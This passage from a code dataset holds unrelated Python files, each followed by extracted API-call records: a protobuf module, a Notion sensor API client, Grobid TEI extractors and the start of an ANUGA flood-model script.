1]'}), '(F, perm=[0, 2, 1])\n', (7140, 7159), True, 'import tensorflow as tf\n'), ((11662, 11853), 'keras.layers.Lambda', 'k.layers.Lambda', (['(lambda x: c10 * (x[0] - 3.0) + c20 * (x[0] - 3.0) ** 2 + c30 * (x[0] - 3.0\n ) ** 3 + c01 * (x[1] - 3.0) + c02 * (x[1] - 3.0) ** 2 + c03 * (x[1] - \n 3.0) ** 3)'], {'name': '"""Psi"""'}), "(lambda x: c10 * (x[0] - 3.0) + c20 * (x[0] - 3.0) ** 2 + \n c30 * (x[0] - 3.0) ** 3 + c01 * (x[1] - 3.0) + c02 * (x[1] - 3.0) ** 2 +\n c03 * (x[1] - 3.0) ** 3, name='Psi')\n", (11677, 11853), True, 'import keras as k\n'), ((11958, 12013), 'keras.layers.Lambda', 'k.layers.Lambda', (['(lambda x: c * (x[0] - 3.0))'], {'name': '"""Psi"""'}), "(lambda x: c * (x[0] - 3.0), name='Psi')\n", (11973, 12013), True, 'import keras as k\n'), ((12157, 12233), 'keras.layers.Lambda', 'k.layers.Lambda', (['(lambda x: c1 * (x[0] - 3.0) + c2 * (x[1] - 3.0))'], {'name': '"""Psi"""'}), "(lambda x: c1 * (x[0] - 3.0) + c2 * (x[1] - 3.0), name='Psi')\n", (12172, 12233), True, 'import keras as k\n'), ((2256, 2281), 'tensorflow.constant', 'tf.constant', (['[1, 0, 0, 0]'], {}), '([1, 0, 0, 0])\n', (2267, 2281), True, 'import tensorflow as tf\n'), ((2547, 2575), 'tensorflow.constant', 'tf.constant', (['[0, 1, 0, 0, 0]'], {}), '([0, 1, 0, 0, 0])\n', (2558, 2575), True, 'import tensorflow as tf\n'), ((10328, 10371), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['P[:, 0, 0]', '(1)'], {}), '(P[:, 0, 0], 1)\n', (10356, 10371), True, 'import tensorflow as tf\n'), ((10980, 11023), 'tensorflow.keras.backend.expand_dims', 'tf.keras.backend.expand_dims', (['P[:, 0, 0]', '(1)'], {}), '(P[:, 0, 0], 1)\n', (11008, 11023), True, 'import tensorflow as tf\n'), ((5801, 5816), 'numpy.power', 'np.power', (['I1', '(2)'], {}), '(I1, 2)\n', (5809, 5816), True, 'import numpy as np\n'), ((8239, 8250), 'tensorflow.shape', 'tf.shape', (['F'], {}), '(F)\n', (8247, 8250), True, 'import tensorflow as tf\n'), ((10797, 10813), 'tensorflow.linalg.det', 'tf.linalg.det', (['F'], {}), '(F)\n', (10810, 10813), True, 'import tensorflow as tf\n'), ((2388, 2397), 'tensorflow.eye', 'tf.eye', (['(3)'], {}), '(3)\n', (2394, 2397), True, 'import tensorflow as tf\n'), ((5843, 5858), 'numpy.power', 'np.power', (['I1', '(3)'], {}), '(I1, 3)\n', (5851, 5858), True, 'import numpy as np\n'), ((5863, 5882), 'numpy.multiply', 'np.multiply', (['I1', 'I2'], {}), '(I1, I2)\n', (5874, 5882), True, 'import numpy as np\n'), ((5914, 5929), 'numpy.power', 'np.power', (['I1', '(2)'], {}), '(I1, 2)\n', (5922, 5929), True, 'import numpy as np\n'), ((6052, 6097), 'numpy.cos', 'np.cos', (['((theta + 2 * np.pi * (k - 1.0)) / 3.0)'], {}), '((theta + 2 * np.pi * (k - 1.0)) / 3.0)\n', (6058, 6097), True, 'import numpy as np\n'), ((6194, 6223), 'numpy.cos', 'np.cos', (['(2.0 / 3.0 * np.pi * k)'], {}), '(2.0 / 3.0 * np.pi * k)\n', (6200, 6223), True, 'import numpy as np\n'), ((6225, 6254), 'numpy.sin', 'np.sin', (['(2.0 / 3.0 * np.pi * k)'], {}), '(2.0 / 3.0 * np.pi * k)\n', (6231, 6254), True, 'import numpy as np\n'), ((6168, 6183), 'numpy.power', 'np.power', (['I1', '(3)'], {}), '(I1, 3)\n', (6176, 6183), True, 'import numpy as np\n'), ((6030, 6045), 'numpy.power', 'np.power', (['I1', '(2)'], {}), '(I1, 2)\n', (6038, 6045), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: get_difference.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from file_repository_sdk.model.file_repository import diff_pb2 as file__repository__sdk_dot_model_dot_file__repository_dot_diff__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='get_difference.proto',
package='archive',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x14get_difference.proto\x12\x07\x61rchive\x1a\x34\x66ile_repository_sdk/model/file_repository/diff.proto\"~\n\x14GetDifferenceRequest\x12\x10\n\x08ver_from\x18\x01 \x01(\t\x12\x0e\n\x06ver_to\x18\x02 \x01(\t\x12\x11\n\tdiff_file\x18\x03 \x01(\t\x12\x0c\n\x04path\x18\x04 \x01(\t\x12\x10\n\x08\x65ncoding\x18\x05 \x01(\t\x12\x11\n\tpackageId\x18\x06 \x01(\t\"u\n\x1cGetDifferenceResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12#\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32\x15.file_repository.Diffb\x06proto3')
,
dependencies=[file__repository__sdk_dot_model_dot_file__repository_dot_diff__pb2.DESCRIPTOR,])
_GETDIFFERENCEREQUEST = _descriptor.Descriptor(
name='GetDifferenceRequest',
full_name='archive.GetDifferenceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='ver_from', full_name='archive.GetDifferenceRequest.ver_from', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ver_to', full_name='archive.GetDifferenceRequest.ver_to', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='diff_file', full_name='archive.GetDifferenceRequest.diff_file', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='path', full_name='archive.GetDifferenceRequest.path', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='encoding', full_name='archive.GetDifferenceRequest.encoding', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='archive.GetDifferenceRequest.packageId', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=87,
serialized_end=213,
)
_GETDIFFERENCERESPONSEWRAPPER = _descriptor.Descriptor(
name='GetDifferenceResponseWrapper',
full_name='archive.GetDifferenceResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='archive.GetDifferenceResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='archive.GetDifferenceResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='archive.GetDifferenceResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='archive.GetDifferenceResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=215,
serialized_end=332,
)
_GETDIFFERENCERESPONSEWRAPPER.fields_by_name['data'].message_type = file__repository__sdk_dot_model_dot_file__repository_dot_diff__pb2._DIFF
DESCRIPTOR.message_types_by_name['GetDifferenceRequest'] = _GETDIFFERENCEREQUEST
DESCRIPTOR.message_types_by_name['GetDifferenceResponseWrapper'] = _GETDIFFERENCERESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetDifferenceRequest = _reflection.GeneratedProtocolMessageType('GetDifferenceRequest', (_message.Message,), {
'DESCRIPTOR' : _GETDIFFERENCEREQUEST,
'__module__' : 'get_difference_pb2'
# @@protoc_insertion_point(class_scope:archive.GetDifferenceRequest)
})
_sym_db.RegisterMessage(GetDifferenceRequest)
GetDifferenceResponseWrapper = _reflection.GeneratedProtocolMessageType('GetDifferenceResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _GETDIFFERENCERESPONSEWRAPPER,
'__module__' : 'get_difference_pb2'
# @@protoc_insertion_point(class_scope:archive.GetDifferenceResponseWrapper)
})
_sym_db.RegisterMessage(GetDifferenceResponseWrapper)
# @@protoc_insertion_point(module_scope)
| [
"google.protobuf.reflection.GeneratedProtocolMessageType",
"google.protobuf.symbol_database.Default",
"google.protobuf.descriptor.FieldDescriptor"
] | [((468, 494), 'google.protobuf.symbol_database.Default', '_symbol_database.Default', ([], {}), '()\n', (492, 494), True, 'from google.protobuf import symbol_database as _symbol_database\n'), ((6604, 6773), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""GetDifferenceRequest"""', '(_message.Message,)', "{'DESCRIPTOR': _GETDIFFERENCEREQUEST, '__module__': 'get_difference_pb2'}"], {}), "('GetDifferenceRequest', (_message.\n Message,), {'DESCRIPTOR': _GETDIFFERENCEREQUEST, '__module__':\n 'get_difference_pb2'})\n", (6644, 6773), True, 'from google.protobuf import reflection as _reflection\n'), ((6924, 7109), 'google.protobuf.reflection.GeneratedProtocolMessageType', '_reflection.GeneratedProtocolMessageType', (['"""GetDifferenceResponseWrapper"""', '(_message.Message,)', "{'DESCRIPTOR': _GETDIFFERENCERESPONSEWRAPPER, '__module__':\n 'get_difference_pb2'}"], {}), "('GetDifferenceResponseWrapper', (\n _message.Message,), {'DESCRIPTOR': _GETDIFFERENCERESPONSEWRAPPER,\n '__module__': 'get_difference_pb2'})\n", (6964, 7109), True, 'from google.protobuf import reflection as _reflection\n'), ((4462, 4806), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""code"""', 'full_name': '"""archive.GetDifferenceResponseWrapper.code"""', 'index': '(0)', 'number': '(1)', 'type': '(5)', 'cpp_type': '(1)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': '(0)', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='code', full_name=\n 'archive.GetDifferenceResponseWrapper.code', index=0, number=1, type=5,\n cpp_type=1, label=1, has_default_value=False, default_value=0,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (4489, 4806), True, 'from google.protobuf import descriptor as _descriptor\n'), ((5627, 5976), 'google.protobuf.descriptor.FieldDescriptor', '_descriptor.FieldDescriptor', ([], {'name': '"""data"""', 'full_name': '"""archive.GetDifferenceResponseWrapper.data"""', 'index': '(3)', 'number': '(4)', 'type': '(11)', 'cpp_type': '(10)', 'label': '(1)', 'has_default_value': '(False)', 'default_value': 'None', 'message_type': 'None', 'enum_type': 'None', 'containing_type': 'None', 'is_extension': '(False)', 'extension_scope': 'None', 'serialized_options': 'None', 'file': 'DESCRIPTOR'}), "(name='data', full_name=\n 'archive.GetDifferenceResponseWrapper.data', index=3, number=4, type=11,\n cpp_type=10, label=1, has_default_value=False, default_value=None,\n message_type=None, enum_type=None, containing_type=None, is_extension=\n False, extension_scope=None, serialized_options=None, file=DESCRIPTOR)\n", (5654, 5976), True, 'from google.protobuf import descriptor as _descriptor\n')] |
import requests
import json
from string import Template
from models.user import User
from models.task import Task
from models.system import System
from models.threshold import Threshold
from models.user_preferences import UserPreferences
from models.alert_perferences import AlertPerferences
from models.base_station import BaseStation
from models.devices import Device
from models.event import Event
from models.location import Location
from models.sensor import Sensor
from models.task_data import TaskData
BASE_URL = "https://api.getnotion.com/api/"
HEADERS = {'content-type': 'application/json'}
AUTH_HEADER = '{"Authorization": "Token token=${token}"}'
class PyNotion:
def __init__(self):
self.r = requests
self.auth_token = None
def get_token(self, user_name, password):
"""
Opens a new session
:param user_name:
:param password:
:return: a user object
"""
url = "{0}users/sign_in".format(BASE_URL)
t = Template('{"sessions": {"email": "${email}", "password": "${password}"}}')
data = t.substitute(email=user_name, password=password)
results = self.r.post(url, data=data, headers=HEADERS)
if results.status_code == 200:
return User(**results.json()['users'])
return results.json()
def kill_token(self):
"""
:return: bool to indication success or failure
"""
url = "{0}users/sign_out".format(BASE_URL)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_my_info(self, user_id):
"""
:return: user object
"""
url = "{}/users/{}".format(BASE_URL, user_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return User(**results['users'])
def delete_user(self, user_id):
url = "{}/users/{}".format(BASE_URL, user_id)
results = self.r.get(url, headers=self._get_auth_header())
return results.status_code == 204
def get_sensors(self):
"""
:return: list of sensors
"""
url = "{}/sensors/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
sensors = []
for sensor in results['sensors']:
sensors.append(Sensor(**sensor))
return sensors
def get_tasks(self):
"""
:return: list of tasks
"""
url = "{}/tasks/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
tasks = []
for task in results['tasks']:
tasks.append(Task(**task))
return tasks
def get_task(self, task_id):
"""
:param task_id:
:return: task object
"""
url = "{}/tasks/{}/".format(BASE_URL, task_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Task(**results['tasks'])
def delete_task(self, task_id):
"""
:param task_id:
:return: Boolean
"""
url = "{}/tasks/{}/".format(BASE_URL, task_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_task_data(self, task_id, data_before, data_after):
# ToDo - Figure out parameters
"""
:param: data_before 2017-01-01T12:00:00.000Z
:param: data_after 2017-01-01T12:00:00.000Z
:param: task_id
:return: task data
"""
url = "{}/tasks/{}/data/?data_before={}&data_after={}".format(BASE_URL, task_id, data_before, data_after)
header = self._get_auth_header()
results = self.r.get(url, headers=header)
try:
return TaskData(**results.json()['task'])
except KeyError as e:
print("Unable to retrieve task data Date format should be '2017-01-01T12:00:00.000Z'.")
def get_systems(self):
"""
:return: list of systems
"""
url = "{}/systems/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
systems = []
for system in results['systems']:
systems.append(System(**system))
return systems
def get_system(self, system_id):
"""
:param system_id:
:return: system details
"""
url = "{}/systems/{}/".format(BASE_URL, system_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return System(**results['systems'])
def delete_system(self, system_id):
"""
:return: Boolean
"""
url = "{}/systems/{}/".format(BASE_URL, system_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_thresholds(self):
"""
:return: list of thresholds
"""
# ToDo - Create/Update Threshold Class
raise NotImplementedError
url = "{}/thresholds/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
thresholds = []
for threshold in results['thresholds']:
thresholds.append(Threshold(**threshold))
return thresholds
def get_threshold(self, threshold_id):
"""
:param threshold_id:
:return: threshold details
"""
raise NotImplementedError
url = "{}/thresholds/{}/".format(BASE_URL, threshold_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Threshold(**results['thresholds'])
def delete_threshold(self, threshold_id):
"""
:param threshold_id:
:return: Boolean
"""
url = "{}/thresholds/{}/".format(BASE_URL, threshold_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_user_preferences(self, user_id):
"""
:return: user preference details
"""
url = "{}/users/{}/user_preferences/".format(BASE_URL, user_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return UserPreferences(**results['user_preferences'])
def get_alert_preferences(self, task_id):
"""
:param task_id:
:return: list of alert_preferences
"""
url = "{}/tasks/{}/alert_preferences".format(BASE_URL, task_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
alert_preferences = []
for alert in results['alert_preferences']:
alert_preferences.append(AlertPerferences(**alert))
return alert_preferences
def get_alert_preference(self, task_id, preference_id):
"""
:param task_id:
:param preference_id:
:return: alert_preference details
"""
url = "{}/tasks/{}/alert_preferences/{}/".format(BASE_URL, task_id, preference_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return AlertPerferences(**results['alert_preferences'])
def delete_alert_preference(self, task_id, preference_id):
"""
:param task_id:
:param preference_id:
:return: Boolean
"""
url = "{}/tasks/{}/alert_preferences/{}/".format(BASE_URL, task_id, preference_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_bridges(self):
"""
:return: list of bridges
"""
url = "{}/base_stations/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
base_stations = []
for base_station in results['base_stations']:
base_stations.append(BaseStation(**base_station))
return base_stations
def get_bridge(self, bridge_id):
"""
:param bridge_id:
:return: bridge details
"""
if bridge_id is None:
return "Bridge ID is a required parameter"
url = "{}/base_stations/{}/".format(BASE_URL, bridge_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return BaseStation(**results['base_stations'])
def delete_bridge(self, bridge_id):
"""
:param bridge_id:
:return: Boolean
"""
if bridge_id is None:
return "Bridge ID is a required parameter"
url = "{}/base_stations/{}/".format(BASE_URL, bridge_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_devices(self):
"""
:return: list of devices
"""
url = "{}/devices/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
devices = []
for device in results['devices']:
devices.append(Device(**device))
return devices
def get_device(self, device_id):
"""
:return: list of devices
"""
if device_id is None:
return "Device Id is a required parameter"
url = "{}/devices/{}".format(BASE_URL, device_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Device(**results['devices'])
def delete_device(self, device_id):
"""
:param device_id
:return: Boolean
"""
if device_id is None:
return "Device Id is a required parameter"
url = "{}/devices/{}".format(BASE_URL, device_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def get_events(self):
"""
:return: list of events
"""
# ToDo - Create Event Object
raise NotImplementedError
url = "{}/events/".format(BASE_URL)
results = self.r.get(url, headers=self._get_auth_header()).json()
events = []
for event in results['events']:
events.append(Event(**event))
return events
def get_event(self, event_id):
"""
:param event_id:
:return: event details
"""
# ToDo - Create Event Object
raise NotImplementedError
if event_id is None:
return "Event ID is a required parameter"
url = "{}/events/{}/".format(BASE_URL, event_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Event(**results['events'])
def get_locations(self, system_id):
"""
:param system_id
:return: list of locations
"""
url = "{}/systems/{}/locations/".format(BASE_URL, system_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
locations = []
for location in results['locations']:
locations.append(Location(**location))
return locations
def get_location(self, location_id, system_id):
"""
:param system_id
:param location_id
:return: location object
"""
url = "{}/systems/{}/locations/{}/".format(BASE_URL, system_id, location_id)
results = self.r.get(url, headers=self._get_auth_header()).json()
return Location(**results['locations'])
def delete_location(self, location_id, system_id):
"""
:param system_id
:param location_id
:return: Boolean
"""
url = "{}/systems/{}/locations/{}/".format(BASE_URL, system_id, location_id)
results = self.r.delete(url, headers=self._get_auth_header())
return results.status_code == 204
def _get_auth_header(self):
t = Template(AUTH_HEADER)
if self.auth_token is None:
print("Please set PyNotion.token\np = PyNotion()\np.token = '<<token here>>'")
exit(1)
return json.loads(t.substitute(token=self.auth_token))
| [
"models.alert_perferences.AlertPerferences",
"models.location.Location",
"models.devices.Device",
"models.user.User",
"string.Template",
"models.threshold.Threshold",
"models.sensor.Sensor",
"models.task.Task",
"models.system.System",
"models.base_station.BaseStation",
"models.user_preferences.U... | [((1003, 1077), 'string.Template', 'Template', (['"""{"sessions": {"email": "${email}", "password": "${password}"}}"""'], {}), '(\'{"sessions": {"email": "${email}", "password": "${password}"}}\')\n', (1011, 1077), False, 'from string import Template\n'), ((1827, 1851), 'models.user.User', 'User', ([], {}), "(**results['users'])\n", (1831, 1851), False, 'from models.user import User\n'), ((2959, 2983), 'models.task.Task', 'Task', ([], {}), "(**results['tasks'])\n", (2963, 2983), False, 'from models.task import Task\n'), ((4550, 4578), 'models.system.System', 'System', ([], {}), "(**results['systems'])\n", (4556, 4578), False, 'from models.system import System\n'), ((5606, 5640), 'models.threshold.Threshold', 'Threshold', ([], {}), "(**results['thresholds'])\n", (5615, 5640), False, 'from models.threshold import Threshold\n'), ((6215, 6261), 'models.user_preferences.UserPreferences', 'UserPreferences', ([], {}), "(**results['user_preferences'])\n", (6230, 6261), False, 'from models.user_preferences import UserPreferences\n'), ((7086, 7134), 'models.alert_perferences.AlertPerferences', 'AlertPerferences', ([], {}), "(**results['alert_preferences'])\n", (7102, 7134), False, 'from models.alert_perferences import AlertPerferences\n'), ((8246, 8285), 'models.base_station.BaseStation', 'BaseStation', ([], {}), "(**results['base_stations'])\n", (8257, 8285), False, 'from models.base_station import BaseStation\n'), ((9326, 9354), 'models.devices.Device', 'Device', ([], {}), "(**results['devices'])\n", (9332, 9354), False, 'from models.devices import Device\n'), ((10537, 10563), 'models.event.Event', 'Event', ([], {}), "(**results['events'])\n", (10542, 10563), False, 'from models.event import Event\n'), ((11313, 11345), 'models.location.Location', 'Location', ([], {}), "(**results['locations'])\n", (11321, 11345), False, 'from models.location import Location\n'), ((11745, 11766), 'string.Template', 'Template', (['AUTH_HEADER'], {}), '(AUTH_HEADER)\n', (11753, 11766), False, 'from string import Template\n'), ((2347, 2363), 'models.sensor.Sensor', 'Sensor', ([], {}), '(**sensor)\n', (2353, 2363), False, 'from models.sensor import Sensor\n'), ((2669, 2681), 'models.task.Task', 'Task', ([], {}), '(**task)\n', (2673, 2681), False, 'from models.task import Task\n'), ((4241, 4257), 'models.system.System', 'System', ([], {}), '(**system)\n', (4247, 4257), False, 'from models.system import System\n'), ((5236, 5258), 'models.threshold.Threshold', 'Threshold', ([], {}), '(**threshold)\n', (5245, 5258), False, 'from models.threshold import Threshold\n'), ((6665, 6690), 'models.alert_perferences.AlertPerferences', 'AlertPerferences', ([], {}), '(**alert)\n', (6681, 6690), False, 'from models.alert_perferences import AlertPerferences\n'), ((7829, 7856), 'models.base_station.BaseStation', 'BaseStation', ([], {}), '(**base_station)\n', (7840, 7856), False, 'from models.base_station import BaseStation\n'), ((8958, 8974), 'models.devices.Device', 'Device', ([], {}), '(**device)\n', (8964, 8974), False, 'from models.devices import Device\n'), ((10083, 10097), 'models.event.Event', 'Event', ([], {}), '(**event)\n', (10088, 10097), False, 'from models.event import Event\n'), ((10930, 10950), 'models.location.Location', 'Location', ([], {}), '(**location)\n', (10938, 10950), False, 'from models.location import Location\n')] |
from extraction.runnables import Extractor, RunnableError, ExtractorResult
import extractor.csxextract.interfaces as interfaces
import extractor.csxextract.config as config
import extractor.csxextract.filters as filters
import defusedxml.ElementTree as safeET
import xml.etree.ElementTree as ET
import xml.sax.saxutils as xmlutils
import extraction.utils
import tempfile
import requests
import re
import os
# Returns full TEI xml document of the PDF
class GrobidTEIExtractor(interfaces.FullTextTEIExtractor):
dependencies = frozenset([filters.AcademicPaperFilter])
result_file_name = '.tei'
def extract(self, data, dep_results):
xml = _call_grobid_method(data, 'processFulltextDocument')
return ExtractorResult(xml_result=xml)
# Returns TEI xml document only of the PDF's header info
class GrobidHeaderTEIExtractor(interfaces.HeaderTEIExtractor):
dependencies = frozenset([filters.AcademicPaperFilter])
result_file_name = '.header.tei'
def extract(self, data, dep_results):
xml = _call_grobid_method(data, 'processHeaderDocument')
return ExtractorResult(xml_result=xml)
class GrobidCitationTEIExtractor(Extractor):
dependencies = frozenset([filters.AcademicPaperFilter])
result_file_name = '.cite.tei'
def extract(self, data, dep_results):
xml = _call_grobid_method(data, 'processReferences')
return ExtractorResult(xml_result=xml)
def _call_grobid_method(data, method):
url = '{0}/api/{1}'.format(config.GROBID_HOST, method)
# Write the pdf data to a temporary location so Grobid can process it
path = extraction.utils.temp_file(data, suffix='.pdf')
files = {'input': (path, open(path, 'rb')),}
try:
resp = requests.post(url, files=files)
except requests.exceptions.RequestException as ex:
raise RunnableError('Request to Grobid server failed')
finally:
os.remove(path)
if resp.status_code != 200:
raise RunnableError('Grobid returned status {0} instead of 200\nPossible Error:\n{1}'.format(resp.status_code, resp.text))
# remove all namespace info from xml string
# this is hacky but makes parsing it much much easier down the road
#remove_xmlns = re.compile(r'\sxmlns[^"]+"[^"]+"')
#xml_text = remove_xmlns.sub('', resp.content)
#xml = safeET.fromstring(xml_text)
xmlstring = re.sub(' xmlns="[^"]+"', '', resp.content, count=1)
xml = safeET.fromstring(xmlstring)
return xml
| [
"requests.post",
"extraction.runnables.RunnableError",
"extraction.runnables.ExtractorResult",
"defusedxml.ElementTree.fromstring",
"re.sub",
"os.remove"
] | [((2384, 2435), 're.sub', 're.sub', (['""" xmlns="[^"]+\\""""', '""""""', 'resp.content'], {'count': '(1)'}), '(\' xmlns="[^"]+"\', \'\', resp.content, count=1)\n', (2390, 2435), False, 'import re\n'), ((2448, 2476), 'defusedxml.ElementTree.fromstring', 'safeET.fromstring', (['xmlstring'], {}), '(xmlstring)\n', (2465, 2476), True, 'import defusedxml.ElementTree as safeET\n'), ((719, 750), 'extraction.runnables.ExtractorResult', 'ExtractorResult', ([], {'xml_result': 'xml'}), '(xml_result=xml)\n', (734, 750), False, 'from extraction.runnables import Extractor, RunnableError, ExtractorResult\n'), ((1085, 1116), 'extraction.runnables.ExtractorResult', 'ExtractorResult', ([], {'xml_result': 'xml'}), '(xml_result=xml)\n', (1100, 1116), False, 'from extraction.runnables import Extractor, RunnableError, ExtractorResult\n'), ((1370, 1401), 'extraction.runnables.ExtractorResult', 'ExtractorResult', ([], {'xml_result': 'xml'}), '(xml_result=xml)\n', (1385, 1401), False, 'from extraction.runnables import Extractor, RunnableError, ExtractorResult\n'), ((1729, 1760), 'requests.post', 'requests.post', (['url'], {'files': 'files'}), '(url, files=files)\n', (1742, 1760), False, 'import requests\n'), ((1906, 1921), 'os.remove', 'os.remove', (['path'], {}), '(path)\n', (1915, 1921), False, 'import os\n'), ((1833, 1881), 'extraction.runnables.RunnableError', 'RunnableError', (['"""Request to Grobid server failed"""'], {}), "('Request to Grobid server failed')\n", (1846, 1881), False, 'from extraction.runnables import Extractor, RunnableError, ExtractorResult\n')] |
#------------------------------------------------------------------------------
# IMPORT NECESSARY MODULES
#------------------------------------------------------------------------------
print (' ABOUT to Start Simulation:- Importing Modules')
import anuga, anuga.parallel, numpy, time, os, glob
from anuga.operators.rate_operators import Polygonal_rate_operator
from anuga import file_function, Polygon_function, read_polygon, create_mesh_from_regions, Domain, Inlet_operator
import anuga.utilities.spatialInputUtil as su
from anuga import distribute, myid, numprocs, finalize, barrier
from anuga.parallel.parallel_operator_factory import Inlet_operator, Boyd_box_operator, Boyd_pipe_operator
from anuga import Rate_operator
#------------------------------------------------------------------------------
# FILENAMES, MODEL DOMAIN and VARIABLES
#------------------------------------------------------------------------------
basename = 'terrain'
outname = 'boyd_pipe'
meshname = 'terrain.msh'
W=296600.
N=6180070.
E=296730.
S=6179960.
#------------------------------------------------------------------------------
# CREATING MESH
#------------------------------------------------------------------------------
bounding_polygon = [[W, S], [E, S], [E, N], [W, N]]
create_mesh_from_regions(bounding_polygon,
boundary_tags={'south': [0], 'east': [1], 'north': [2], 'west': [3]},
maximum_triangle_area=1.0,
filename=meshname,
use_cache=False,
verbose=True)
#------------------------------------------------------------------------------
# SETUP COMPUTATIONAL DOMAIN
#------------------------------------------------------------------------------
domain = Domain(meshname, use_cache=False, verbose=True)
domain.set_minimum_storable_height(0.0001)
domain.set_name(outname)
print (domain.statistics())
#------------------------------------------------------------------------------
# APPLY MANNING'S ROUGHNESSES
#------------------------------------------------------------------------------
domain.set_quantity('friction', 0.035)
domain.set_quantity('elevation', filename=basename+'.csv', use_cache=False, verbose=True, alpha=0.1)
